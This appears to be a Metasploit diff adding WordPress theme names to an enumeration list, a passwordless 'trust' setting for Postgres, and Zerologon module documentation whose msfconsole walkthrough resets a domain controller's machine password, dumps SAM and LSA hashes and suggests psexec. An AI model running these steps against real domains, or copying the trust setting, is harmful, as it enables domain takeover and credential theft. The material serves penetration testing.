@@ -16990,6 +18699,7 @@ travel-canvas
 travel-club
 travel-company
 travel-diaries
+travel-escape
 travel-eye
 travel-eye12312312
 travel-gem
@@ -17000,13 +18710,16 @@ travel-insight
 travel-inspired
 travel-is-my-life
 travel-is-my-life2
+travel-joy
 travel-lifestyle
 travel-lite
 travel-log
 travel-log-by-taddeiweb
 travel-magazine
+travel-master
 travel-minimalist-blogger
 travel-notes
+travel-ocean
 travel-planet
 travel-power
 travel-route
@@ -17014,6 +18727,7 @@ travel-stories
 travel-team95
 travel-to-egypt
 travel-tour
+travel-tourism
 travel-trek
 travel-ultimate
 travel-way
@@ -17021,14 +18735,19 @@ traveladdict-lite
 traveladdict-liteliye
 travelagency
 travelair
+travelberg
+travelbiz
 travelblog
 traveler
 traveler-blog
 traveler-blog-lite
 travelera-lite
 travelers
+travelers-blog
+travelia
 travelifestyle
 travelify
+travelingist
 travelkit
 travellandia
 travellator
@@ -17037,11 +18756,15 @@ travello
 travelmuch
 travelo
 travelofe
+travelogged
 travelogue
 travelogue-theme
+travelore
+travelstore
 traveltheme
 travern
 traverse-diary
+traversify-lite
 travia
 traza
 trcapital-lite
@@ -17054,12 +18777,15 @@ tree-house
 trees
 treeson
 treestruct
+trek-lite
 tremendous
 tremor
+trend-news
 trend-portal
 trend-shop
 trending
 trending-blog
+trending-mag
 trendmag
 trendmag-lite
 trendpress
@@ -17078,10 +18804,13 @@ tribal
 tribbiani
 tribe
 tribes
+tribunal
 tribune
 tribune-magazine
 tribute
 trick-treat
+trickling
+tricore
 tricore-blog
 trident-lite
 trifold
@@ -17099,6 +18828,7 @@ tripix
 triplec
 trisense
 trisha
+trishul
 tristan-andelay
 triton-lite
 triumph-seo
@@ -17118,6 +18848,7 @@ true-blue
 true-blue-hue
 true-blue-theme
 true-concept-photography
+true-news
 trueblood
 truelove
 truewest-free
@@ -17156,6 +18887,7 @@ tuaug4
 tube
 tucana
 tuckers-wordpress-theme
+tucktv
 tucson-dreams
 tuesday
 tuincentrumsling
@@ -17172,6 +18904,7 @@ turbine-theme
 turbo-seo-blog
 turin
 turnkey-storefront
+turret
 turtles
 turuncu-gemi
 tusi
@@ -17204,6 +18937,7 @@ tweaker2-theme
 tweaker3
 tweaker4
 tweaker5
+tweb-business
 tweeble-plus
 tweet-molon
 tweetmeblue
@@ -17268,6 +19002,7 @@ twenty-fourteentwentyfourteen1
 twenty-httpswordpress-orgthemestwentyseventeen
 twenty-minutes
 twenty-nineteen-flat
+twenty-nineteen-two
 twenty-nineteen12312321
 twenty-o-five
 twenty-onlyk
@@ -17291,6 +19026,7 @@ twenty-seventeenstyle-css
 twenty-seventeentsetserdar
 twenty-seventeentwentyseventeen-2
 twenty-seventeentwentyseventeenrr
+twenty-shai
 twenty-simplified
 twenty-six
 twenty-sixteen-amrita
@@ -17353,6 +19089,10 @@ twenty-twelve-toastmasters
 twenty-twelve1
 twenty-twelvegaeta
 twenty-twelvetwentytwelve-1-7
+twenty-twenty-child
+twenty-twenty-plus
+twenty-twenty20
+twenty-two-five
 twenty11
 twenty8teen
 twentyb
@@ -17366,6 +19106,7 @@ twentyseventeen
 twentysixteen
 twentysixteen-custom
 twentysixteen-customed-for-kishoredbn
+twentysixteen12
 twentyten
 twentyten-design-starter
 twentyten-extended
@@ -17375,6 +19116,7 @@ twentytwelve
 twentytwelve-child-personal
 twentytwelve-custom
 twentytwelve-schema-org-child
+twentytwenty
 twentyxlarge
 twentyxs
 twentyxs-child
@@ -17387,6 +19129,7 @@ twist-it-lite
 twist-of-ten
 twistedaxis
 twistit-free-version
+twisty
 twitter-maniac
 twitter-themes
 twitter-wordpress-theme
@@ -17401,6 +19144,7 @@ two-thousand-seventeen
 two-three-bears-hanging-on-the-tree
 twocolors
 twofile
+twopage-parallax
 twordder
 twwenty-twelve
 twwwenty-twelve
@@ -17423,6 +19167,7 @@ typecore
 typecore1
 typefocus
 typepress
+typer
 typesetter
 typewriter
 typical
@@ -17457,6 +19202,7 @@ ukulight
 ulexi
 ulisse-theme
 ulmer-azubiblog
+ulta-minimal-blog
 ultima-basic
 ultimate
 ultimate-amp
@@ -17464,14 +19210,21 @@ ultimate-amp2
 ultimate-blogger
 ultimate-ecommerce-shop
 ultimate-ecommerce-shop-2
+ultimate-mag
+ultimate-restaurant
 ultimate-showcase
 ultra
 ultra-bootstrapthemes
 ultra-framework
+ultra-lite
 ultra-lite-blog
+ultra-minimal-blog
+ultra-news
+ultra-print
 ultra-seven
 ultrabootstrap
 ultralight
+ultrapress
 um
 uma
 uma-wp-theme
@@ -17479,11 +19232,13 @@ umacozinhaparadois
 umair_butt
 umake
 umar-waqas
+umb
 umbra
 un-jour-en-hiver
 una
 unar
 unar-lite
+unax
 unbox-tours
 uncode
 uncode-lite
@@ -17493,6 +19248,8 @@ undedicated
 undedicated_v2
 undeniable
 under-construction
+under-construction-lite
+under-milligram
 under-the-influence
 under-the-sea
 under-the-shade
@@ -17520,6 +19277,7 @@ unicon-lite
 unicons
 unicons-xmas
 unicorn
+unidesignz
 unifield
 unifield2
 uniform
@@ -17532,6 +19290,7 @@ unique
 unique-blog
 unique-munk
 unisco
+unish
 unit
 unit6
 unit6-theme
@@ -17549,6 +19308,7 @@ universal-store
 universal-web
 universam-store-leader
 universe
+universe2
 university
 university-hub
 university-max
@@ -17563,8 +19323,15 @@ unnamed-tabloid
 unoblog-lite
 unocfla
 unos
+unos-business
+unos-glow
+unos-magazine-black
+unos-magazine-vu
+unos-publisher
+unos-store-bell
 unplugged
 unreal-dark
+unschool
 unspeakabledogness
 untamed
 untheme-two-column
@@ -17577,21 +19344,28 @@ unyversal
 uog
 up-front
 up-front-wp
+upcart
 update-tucson
 updown-cloud
 upeo
+upeo-business
 upliftingblog
 uplodadzip
 upright
+upseo
 upside-lite
 upstart-blogger-modicus
 uptown
+uptown-style
+uraan
 urban
 urban-bold
+urban-charity
 urban-girl
 urban-grunge
 urban-life
 urban-lite
+urban-lite-pmc
 urban-square
 urban-view
 urbanfabrica
@@ -17603,6 +19377,7 @@ urja-solar-energy
 urwahl3000
 usa-management
 usable-l-c-r
+usain
 usama
 use-your-brains
 user-friendly
@@ -17616,10 +19391,12 @@ utieletronica
 utility
 utilys
 utopia
+utouch-lite
 utsav-event-planner
 uu-2014
 uw-madison-2015
 uwc
+v-blog
 v-star-blogger
 v11
 v11-theme
@@ -17643,11 +19420,15 @@ valerie
 valiant
 valkano
 valkmedia
+valley-lite
 valmiki
 valo
 valross
 valve
 van-gogh
+vancura
+vandana-health-coach
+vandana-lite
 vania
 vanilj
 vanilla
@@ -17670,12 +19451,14 @@ variant-landing-page-two
 variant-lite-landing-page
 variantmagazine
 various
+varuna
 vasco
 vashikaran
 vast
 vauogati
 vayne
 vazir
+vbasic
 vblog
 vbseo-style-20-wordpress-theme
 vcard
@@ -17703,6 +19486,8 @@ veggie-lite1-2
 veggie-poem
 vei-do-ceu
 vei-do-saco
+veikals
+veloce
 velove-lite
 velox
 velux
@@ -17732,12 +19517,16 @@ verado-lite
 verb-lite
 verbo
 verbosa
+verdant
 verge
+veridicta
 veritas
 verity
 vermillon
 veroxa
 versal
+versatile-business
+versatile-business-dark
 versitility
 verso
 verso-lite
@@ -17761,6 +19550,8 @@ vesper-dark
 vess-test
 vesta-lite
 vestalite
+vesteo
+vestia
 veterinary-pet-care
 vex
 vg-mimosa
@@ -17770,11 +19561,13 @@ vg-sento
 viable-blog
 viable-fame
 viable-lite
+viaggio-lite
 viala
 viavi-blog
 vibe
 vibefolio-teaser-10
 vibox
+vibrant_nina
 vic2
 vice
 vice-child
@@ -17815,11 +19608,13 @@ vigilant
 vihaan-blog-lite
 vijspa
 vikas_chauhan_theme
+vikata
 viking
 vikiworks-infinity
 viktor-classic
 viktor-lite
 village
+vilva
 vina
 vinay
 vinci
@@ -17843,10 +19638,12 @@ violinesth
 violinesth-forever
 viomag
 viotheme
+vip-business
 viper
 viral
 viral-1k
 viral-blog
+viral-news
 viral-youtube-traffic
 viralblog-lite
 viralfree
@@ -17887,10 +19684,13 @@ vista84
 vistalicious
 vistro
 visual
+visual-blog
+visual-coffee
 visual-composer-starter
 visual-sense-light
 visual-violent
 visualblog
+visualize
 vita
 vito
 vitrals
@@ -17900,6 +19700,7 @@ vivacity
 vivacity-lite
 vivah-royal-wedding
 vivex
+vivid-blog
 vivid-night
 vivita
 vixka
@@ -17907,6 +19708,7 @@ vixy-catch
 vizuit
 vk-style-for-wp
 vlogger
+vlogger-video-blog
 vlogr
 vmag
 vmagazine-lite
@@ -17914,7 +19716,9 @@ vmagazine-news
 vnotebook
 voce
 vogue
+vogue-life
 voice-blog
+voice-blog-lite
 voidy
 volghier
 vollmilch
@@ -17932,6 +19736,7 @@ vovinam-light
 voyage
 voyager
 voyo
+vromon
 vrooom
 vrup
 vryn-parallax
@@ -17942,8 +19747,10 @@ vstart
 vt-blogging
 vt-grid-mag
 vt-grid-mag-lite
+vtheme
 vtl-shop
 vuthy
+vvv
 vw-app-lite
 vw-application
 vw-automobile-lite
@@ -17952,7 +19759,9 @@ vw-blog-magazine
 vw-book-store
 vw-car-rental
 vw-charity-ngo
+vw-cleaning-company
 vw-construction-estate
+vw-consulting
 vw-corporate-business
 vw-corporate-lite
 vw-corporate-lite-2
@@ -17980,6 +19789,7 @@ vw-lawyer-attorney
 vw-magazine
 vw-maintenance-services
 vw-medical-care
+vw-minimalist
 vw-mobile-app
 vw-mobile-app-red-canoa
 vw-newspaper
@@ -17990,6 +19800,7 @@ vw-personal-trainer
 vw-pet-shop
 vw-photography
 vw-portfolio
+vw-real-estate
 vw-restaurant-lite
 vw-restaurant-lite2
 vw-school-education
@@ -17997,6 +19808,7 @@ vw-security-guard
 vw-solar-energy
 vw-spa-lite
 vw-startup
+vw-storefront
 vw-tour-lite
 vw-transport-cargo
 vw-travel
@@ -18026,6 +19838,7 @@ w016
 w017
 w018
 w1redtech
+w3css
 w3t-fuseki
 w7c_iz
 wabc
@@ -18049,6 +19862,7 @@ walnut
 walser
 waltz-with-bashir
 wanda
+wanda-lite
 wanderlust
 waniliowa-noc
 wappos
@@ -18065,6 +19879,7 @@ warmwinter
 warna-warni
 warpress-warhammer-wordpress-theme
 warx
+washing-center
 washington
 wasif
 wasteland
@@ -18074,6 +19889,7 @@ water
 water-drops-theme
 water-lily
 water-mark
+water-sports-club
 watercolor
 waterloo
 waternymph-and-dolphin
@@ -18084,6 +19900,7 @@ wave
 wave-lite
 wavefront
 waves
+wayne-blog-news
 wbhosts
 wbox
 wbsimple
@@ -18105,13 +19922,16 @@ web-20-blue
 web-20-pinky
 web-20-simplified
 web-app
+web-conference
 web-design-web8
 web-development
 web-grapple
+web-host
 web-hosting
 web-hosting-theme
 web-log
 web-minimalist-200901
+web-portfolio
 web20-seo
 web5
 webagency
@@ -18127,6 +19947,7 @@ webdesign-theme
 webdesignerdeveloper
 webdiary
 webeeo
+webet
 webgist
 webgrapple
 webify
@@ -18135,6 +19956,7 @@ weblizar
 weblizar-brown
 weblog
 weblog-magazine_green
+weblogs
 webmagazine
 webmedia
 webmix-corporate
@@ -18145,6 +19967,7 @@ webpride
 webshop
 website
 websiteright
+websitesetup-business
 websitez-mobile-theme
 webstarslite
 webstarterkitthirteen
@@ -18163,18 +19986,22 @@ wedding-band
 wedding-bells
 wedding-bells-lite
 wedding-bride
+wedding-couples
 wedding-happily-ever-after
 wedding-journal
 wedding-party
 wedding-photos
 wedding-style
+wedding_nardaa
 weddingcity-lite
 weddingindustry
 weddinglist
 weddingphotography
 weddings
 weddlist
+weddmag
 wedlock
+wednesday
 wefoster
 weh-lite
 weight-loss-tea
@@ -18190,6 +20017,7 @@ wellness-child
 wen-associate
 wen-business
 wen-corporate
+wepora
 werka
 west
 western
@@ -18202,6 +20030,7 @@ wfclarity
 wg-piccolo
 wg-piccolo-theme
 wgmc-uniform
+whack-it
 what-so-proudly-we-hail
 whatnew
 wheat
@@ -18271,8 +20100,11 @@ whitey08-green
 whitish
 whitish-lite
 whitney
+wholly
 whoop
 why-hello-there
+wi-education
+wi-travel
 wic2015
 wichita
 wide-blog-happens
@@ -18284,6 +20116,7 @@ width-smasher
 wigshop
 wiilike
 wijmo
+wikidocs
 wikiparaça
 wikisquare
 wikiwp
@@ -18293,6 +20126,7 @@ wild-safari-lite
 wild-west
 wildbook
 wildfire
+wildlife-lite
 wiles
 wilfrid
 wilinia
@@ -18346,6 +20180,7 @@ wipi
 wiral-lite
 wiredrive-classic
 wisdom-blog
+wisdom-blog-123
 wisdom-bold
 wisdom-journal
 wisdom-minimal
@@ -18354,6 +20189,10 @@ wise
 wise-church
 wisecat-11
 wishbone
+wishful-blog
+wishful-travel
+wishlist
+wisnia
 wiso
 wispy-fish
 wistarter
@@ -18365,7 +20204,10 @@ withtech
 witness
 wittgenstein
 wix
+wiz-ecommerce
 wiziapp-smooth-touch
+wk-wow
+wkeducation
 wlow
 wodpresstheme-uri-httpwww-acmethemes-comthemessupermag
 wolf
@@ -18374,6 +20216,7 @@ wolf-starter
 women-clothing
 women-theme
 women_clothing
+womenmagaz
 wonder
 wondrous
 woo
@@ -18410,6 +20253,7 @@ woody
 woody-smooth
 wooeco
 wooketing
+woomart
 woosti
 woostifi
 woostify
@@ -18423,8 +20267,11 @@ wordbluex
 wordcraft
 wordecho
 wordgray
+wordify
 wordily
 wordit
+wordkit
+wordly
 wordnews
 wordousel-lite
 wordplus
@@ -18492,10 +20339,13 @@ worldwide
 wortex-lite
 worthy
 wos
+wow
 wow-blackened
 wow-blog
 wow-blue
 wow-pop
+wowmag
+wowpress
 wowsome
 wowza
 wp
@@ -18513,6 +20363,7 @@ wp-awesome
 wp-barrister
 wp-bats-theme
 wp-bedrock
+wp-blen
 wp-blog
 wp-blogcrash
 wp-blogger
@@ -18520,6 +20371,7 @@ wp-blogthirteen
 wp-booti
 wp-bootstrap
 wp-bootstrap-4
+wp-bootstrap-4-essentials
 wp-bootstrap-starter
 wp-bootstrap-starter-child
 wp-bootstrap-starter-theme
@@ -18550,6 +20402,7 @@ wp-doppio
 wp-dynamo
 wp-eden
 wp-enlightened
+wp-fancy
 wp-fanzone
 wp-faster
 wp-fastest
@@ -18570,10 +20423,12 @@ wp-headr
 wp-hot-cook
 wp-iclean-responsive
 wp-igmg
+wp-indigo
 wp-inspirat
 wp-inspire-writer
 wp-inspiremagtheme-uri-httpinspirenxt-comthemeswp-inspiremagauthor-sajan-kota
 wp-invictus
+wp-jannah
 wp-jekyll
 wp-jurist
 wp-knowledge-base
@@ -18581,9 +20436,12 @@ wp-knowledge-base-theme
 wp-kube
 wp-less-is-more
 wp-lets
+wp-liquid-web
 wp-liteflex
 wp-locksmith
 wp-macchiato
+wp-magazine
+wp-magazine-pluss
 wp-marketingstrap
 wp-mashthirteen
 wp-masonry
@@ -18595,10 +20453,12 @@ wp-mint-magazine
 wp-movies
 wp-mozilla-community-theme-v2
 wp-my-business
+wp-nathy
 wp-news-classic
 wp-news-stream
 wp-newsmagazine
 wp-nice-mix
+wp-notebook
 wp-one
 wp-opencart
 wp-opulus
@@ -18606,6 +20466,7 @@ wp-orange-inspirat
 wp-ornate
 wp-paper
 wp-parastrap
+wp-pendidikan
 wp-perfect
 wp-plumber
 wp-plus
@@ -18656,6 +20517,7 @@ wp-tour-package
 wp-trie
 wp-tube-premium
 wp-twitter-bootstrap
+wp-uikit
 wp-unframework
 wp-weaver
 wp-well-mixed
@@ -18668,6 +20530,7 @@ wp960gs
 wp_contempo_plain
 wp_edublog
 wp_fall_theme
+wp_lily
 wp_monochrome
 wp_qoob_theme
 wp_shiftedblank
@@ -18678,6 +20541,8 @@ wpadzone-lite
 wpagency
 wpapi
 wpapp-ninja
+wpazure
+wpbakers-really-simple
 wpbeg
 wpbeginner
 wpblogger
@@ -18685,6 +20550,7 @@ wpbo
 wpboot
 wpbri
 wpbricks
+wpbstarter
 wpburn-blue
 wpbus-d4
 wpbyd
@@ -18695,6 +20561,7 @@ wpcomic
 wpcount
 wpcouponcode
 wpcrest
+wpcrux
 wpcs-ocean
 wpd-inspire
 wpdetail
@@ -18704,6 +20571,7 @@ wpdocs
 wpeden-responsive
 wpelegance2col
 wpesp-portfolio-theme-coda
+wpex-today
 wpf-authority
 wpf-flaty
 wpf-ultraresponsive
@@ -18724,6 +20592,7 @@ wpjobman
 wpl-twentyeight
 wplab-pro-wpcms
 wplabo-aries
+wplaboaries
 wplatformer
 wplets
 wplight-theme
@@ -18751,6 +20620,8 @@ wprast-standard
 wprast-tech
 wpress-me-fashion-blog
 wprestyle
+wpsection
+wpsections
 wpsense
 wpsimplicity
 wpsimplified
@@ -18776,6 +20647,7 @@ wpu-simple-clean
 wpvision-lite
 wpvkp-minimal-blog
 wpxon-blog
+wpxon-portfolio
 wpyaml
 wpyeasfi
 wpyoutube
@@ -18787,6 +20659,9 @@ wrb-pxforce
 wren
 writ
 write
+write-and-read
+write-and-read-s
+write-and-read-v1-1
 write-blog
 write-blogging
 writee
@@ -18795,6 +20670,7 @@ writee-grid
 writee-parsi
 writer
 writer-blog
+writera
 writerblog
 writers
 writers-blog
@@ -18812,18 +20688,23 @@ writingstab
 writr
 written
 writter
+writy
 wrock-metro
 wsc
 wsc6
 wsc7
+wsddc-vol1
+wsddc_theme_vol1
 wshop
 wsq-light
 wstrap
+wsu-business
 wtc-brown-gallery
 wtgo-theme
 wu-standard
 wu-wei
 wunderbar
+wuqi
 ww-design
 www-eastbaybusinesses-com
 www-eastbayservicebusinesses-com
@@ -18836,11 +20717,15 @@ x-bliss
 x-blog
 x-blog-color
 x-blog-lite
+x-blog-plus
 x-business
 x-corporate
+x-crop
 x-effect
+x-magazine
 x-mas
 x-portfolio
+x-shop
 x-store
 x-view
 x2
@@ -18848,6 +20733,7 @@ x2-lite
 x6
 xabstract
 xaklin
+xavialite
 xblog
 xbloglite
 xcandy
@@ -18857,6 +20743,7 @@ xclusive
 xcode
 xdwaken
 xemifolio
+xena
 xeom
 xevent-magazine
 xevent-theme
@@ -18882,7 +20769,9 @@ xmas9
 xmax
 xmotion
 xodogo
+xolo
 xonstruction
+xooblog
 xoxo
 xoxolite
 xperson-lite
@@ -18890,9 +20779,12 @@ xpinkfevertlx
 xpressmag
 xproweb
 xseason
+xshop
+xsimply
 xt-corporate-lite
 xtempt
 xtheme
+xtraroofing
 xtron
 xwb
 xxxx
@@ -18900,14 +20792,19 @@ xydw-blog
 xylus
 y
 y2k
+yaatra
 yachting
 yadayada-minimalismus
 yadayada-zen
 yaga
 yahoo
 yahui
+yahya
 yais
 yajimuma
+yala-blog
+yala-mag
+yala-travel
 yalatech-education
 yama
 yamayama
@@ -18929,12 +20826,15 @@ yashfa
 yasothon
 yast-yet-another-standard-theme
 yat_mattery
+yatri
 yayoga
 yazigi
 yb-auto
 yb-light
+ybloom
 yboris
 yboris-minimalist
+yeadh
 yeast-diet
 yello20
 yellow
@@ -18950,26 +20850,32 @@ yepza
 yes-co-ores-theme
 yesp
 yeti-5
+yeuloli
 yeyita
 yg-desire
 yhsnews
 yifengxuan
 yinyang
+yith-proteo
 yleave
 ymac
 ymflyingred
 ymoo
 yo-manga
 yo-yo-po
+yo_fik
 yocto
 yoga
+yoga_guru
 yogaclub-lite
 yogafitness
 yogasana-lite
 yogi
+yogic-lite
 yoko
 yokospark
 yolo-naveda
+yolo-ready
 yolo-seo
 yomel
 yonarex
@@ -19007,6 +20913,7 @@ yule
 yume
 yume-tan
 yummy
+yummy-recipe
 yuniho
 yuru2cafe
 yuta
@@ -19014,6 +20921,7 @@ yuuta
 yuviaakash
 yuvix
 yway
+yydevelopment-basic
 z-arcana
 zack
 zack-990
@@ -19024,6 +20932,9 @@ zaffre
 zag
 zaha-lee
 zakra
+zakra1
+zakraaaaaaaaa
+zala
 zalive
 zamura
 zantourism
@@ -19043,6 +20954,7 @@ zbench1
 zblackbeard
 zblackbeard1
 zblackbeardb
+zboommusic
 zborder
 zcool-like
 zdark
@@ -19073,6 +20985,8 @@ zeetasty
 zeevision
 zeko-lite
 zelle-lite
+zemez
+zemix
 zen
 zen-bleu
 zen-garden
@@ -19100,6 +21014,7 @@ zenpro
 zensky
 zenstory
 zentepa
+zentile
 zento
 zenwares
 zenwater
@@ -19139,6 +21054,8 @@ zgrey
 zhuti
 zica-lite-one-page
 zifer-child
+zigcy-baby
+zigcy-cosmetics
 zigcy-lite
 ziggydemar
 zigzagblog
@@ -19159,6 +21076,7 @@ zion
 zippy
 zircone
 zita
+zita-storefront
 zixnru-autumn
 zixnru-theme
 zkrally
@@ -19172,6 +21090,7 @@ zmooncake
 znktheme-uri-httpssketchthemes-compremium-themesappointment-booking-wordpress-theme-for-consultants
 zodiac-lite
 zoe
+zoko
 zombie
 zombie-apocalypse
 zombiehost
@@ -19179,8 +21098,10 @@ zomer
 zomernadia
 zomg
 zomghow
+zonaed
 zoner-lite
 zoner-lite-aks
+zonic
 zoo
 zoom-lite
 zoom-theme
@@ -19189,6 +21110,7 @@ zopit
 zotilz-lite
 zotilz-lite-responsive-theme
 zotilz-lite-responsive-wordpress-theme
+zoto
 zovees
 zovees-blue
 zsimply
@@ -19200,6 +21122,7 @@ ztech
 ztest
 ztheme-simplev20
 zuari
+zubin
 zues
 zuluocms
 zupabuilder
@@ -15,6 +15,8 @@ services:
    image: postgres:10-alpine
    volumes:
      - pg_data:/var/lib/postgresql/data
+    environment:
+      POSTGRES_HOST_AUTH_METHOD: trust

 volumes:
  pg_data:
@@ -0,0 +1,173 @@
+## Vulnerable Application
+A vulnerability exists within the Netlogon authentication process where the security properties granted by AES are lost
+due to an implementation flaw related to the use of a static initialization vector (IV). An attacker can leverage this
+flaw to target an Active Directory Domain Controller and make repeated authentication attempts using NULL data fields
+which will succeed every 1 in 256 tries (~0.4%). This module leverages the vulnerability to reset the machine account
+password to an empty string, which will then allow the attacker to authenticate as the machine account. After
+exploitation, it's important to restore this password to it's original value. Failure to do so can result in service
+instability.
+
+The `auxiliary/gather/windows_secrets_dump` module can be used to recover the original machine account password which
+can then be restored with this module by using the `RESTORE` action and setting the `PASSWORD` value.
+
+## Verification Steps
+
+1. Exploit the vulnerability to remove the machine account password by replacing it with an empty string
+    1. From msfconsole
+    1. Do: `use auxiliary/admin/dcerpc/cve_2020_1472_zerologon`
+    1. Set the `RHOSTS` and `NBNAME` values
+    1. Run the module and see that the original machine account password was removed
+1. Recover the original machine account password
+    1. Do: `use auxiliary/gather/windows_secrets_dump`
+    1. Set the `RHOSTS` values
+    1. Set the `SMBUser` option to the NetBIOS name with a trailing `$`, e.g. `NBNAME$`
+    1. Set the `SMBPass` option to `aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0` (the hash of an empty password)
+    1. Run the module and search for the password in the output (`NBNAME$:plain_password_hex:`)
+1. Restore the original machine account password
+    1. From msfconsole
+    1. Do: `use auxiliary/admin/dcerpc/cve_2020_1472_zerologon`
+    1. Set the action to `RESTORE`
+    1. Set the `RHOSTS`, `NBNAME` and `PASSWORD` values
+    1. Run the module and see that the original value was restored
+
+## Options
+
+### NBNAME
+
+The NetBIOS name of the target domain controller. You can use the `auxiliary/scanner/netbios/nbname` module to obtain
+this value. If this value is invalid the module will fail when making a Netlogon RPC request.
+
+### PASSWORD
+
+The hex value of the original machine account password. This value is typically recovered from the target system's
+registry (such as by using the `auxiliary/gather/windows_secrets_dump` Metasploit module) after successfully setting the
+value to an empty string within Active Directory using this module and the default `REMOVE` action.
+
+This value is only used when running the module with the `RESTORE` action.
+
+## Scenarios
+
+### Windows Server 2019
+
+First, exploit the vulnerability to remove the machine account password by replacing it with an empty string.
+
+```
+msf6 > use auxiliary/admin/dcerpc/cve_2020_1472_zerologon 
+msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set RHOSTS 192.168.159.53 
+RHOSTS => 192.168.159.53
+msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set NBNAME WIN-GD5KVDKUNIP
+NBNAME => WIN-GD5KVDKUNIP
+msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > show options 
+
+Module options (auxiliary/admin/dcerpc/cve_2020_1472_zerologon):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   NBNAME  WIN-GD5KVDKUNIP  yes       The server's NetBIOS name
+   RHOSTS  192.168.159.53   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT                    no        The netlogon RPC port (TCP)
+
+
+Auxiliary action:
+
+   Name    Description
+   ----    -----------
+   REMOVE  Remove the machine account password
+
+
+msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run
+[*] Running module against 192.168.159.53
+
+[*] 192.168.159.53: - Connecting to the endpoint mapper service...
+[*] 192.168.159.53:6403 - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.53[6403] ...
+[*] 192.168.159.53:6403 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.53[6403] ...
+[+] 192.168.159.53:6403 - Successfully authenticated
+[+] 192.168.159.53:6403 - Successfully set the machine account (WIN-GD5KVDKUNIP$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) >
+```
+
+At this point the `exploit/windows/smb/psexec` module can be used to achieve code execution if desired. Set the `SMBUser` option to the
+machine account and the `SMBPass` option to the empty password value.
+
+Next, recover the original machine account password value using `auxiliary/gather/windows_secrets_dump`. Look for the `plain_password_hex`
+value in the `$MACHINE.ACC` section.
+
+```
+msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > use auxiliary/gather/windows_secrets_dump 
+msf6 auxiliary(gather/windows_secrets_dump) > set RHOSTS 192.168.159.53
+RHOSTS => 192.168.159.53
+msf6 auxiliary(gather/windows_secrets_dump) > set SMBUser WIN-GD5KVDKUNIP$
+SMBUser => WIN-GD5KVDKUNIP$
+msf6 auxiliary(gather/windows_secrets_dump) > set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
+SMBPass => aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
+msf6 auxiliary(gather/windows_secrets_dump) > run
+[*] Running module against 192.168.159.53
+
+[*] 192.168.159.53:445 - Service RemoteRegistry is already running
+[*] 192.168.159.53:445 - Retrieving target system bootKey
+[+] 192.168.159.53:445 - bootKey: 0xa11f7c33c8bab9e427dec59436dbb17d
+[*] 192.168.159.53:445 - Saving remote SAM database
+[*] 192.168.159.53:445 - Dumping SAM hashes
+[*] 192.168.159.53:445 - Password hints:
+No users with password hints on this system
+[*] 192.168.159.53:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
+Administrator:500:aad3b435b51404eeaad3b435b51404ee:6df12cddaa88057f06a80b5ee73b949b:::
+Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d17ae931b73c5ad7e0c089c0:::
+DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d17ae931b73c5ad7e0c089c0:::
+[*] 192.168.159.53:445 - Saving remote SECURITY database
+[*] 192.168.159.53:445 - Decrypting LSA Key
+[*] 192.168.159.53:445 - Dumping LSA Secrets
+$MACHINE.ACC
+EXCHG\WIN-GD5KVDKUNIP$:plain_password_hex:4151e8f8490762bc47ec11855921aef606f9d37176aef0f43a3fc6dc4aefc4c0d7bb7b88ad635a11f94de37e0d82495bab1dec25ac9d547910f94332f4598de372c07635fba1f6592bd3bb5aeb827cb088b1cae8db872b59e267ccfef1df40580c8d918befb3c39d809a6c89767a466f88f40eb373f86cf20c9b6a07e89b596e14a44eae6a4ae55b92a481b71452a3bbab2d5735d70868b778541f3c6e4d1c8c097c086bc40d364c01d4520b8a86a217ac79b4e826b9dc2eedd0a834146e3f6fba7422960dbd4051f499be61eca4e1aeba786030acfdd21e9f5a98a35a3f0430cf0b536bff99163118a1c75ec852cc2d
+EXCHG\WIN-GD5KVDKUNIP$:aes256-cts-hmac-sha1-96:127c328739d4406e6734684b971709acb2215f947b961355fa25b9b3fda38a08
+EXCHG\WIN-GD5KVDKUNIP$:aes128-cts-hmac-sha1-96:becbe21ab050ccb1d8a5b908839fd95f
+EXCHG\WIN-GD5KVDKUNIP$:des-cbc-md5:b5f843cec2e56220
+EXCHG\WIN-GD5KVDKUNIP$:aad3b435b51404eeaad3b435b51404ee:ec3a7fa2158f1f705898d538ad3aafaf:::
+...
+
+[*] 192.168.159.53:445 - Decrypting NL$KM
+[*] 192.168.159.53:445 - Dumping cached hashes
+No cached hashes on this system
+[*] 192.168.159.53:445 - Cleaning up...
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/windows_secrets_dump) >
+```
+
+Finally, restore the original value using this module.
+
+```
+msf6 auxiliary(gather/windows_secrets_dump) > use auxiliary/admin/dcerpc/cve_2020_1472_zerologon 
+msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set ACTION RESTORE 
+ACTION => RESTORE
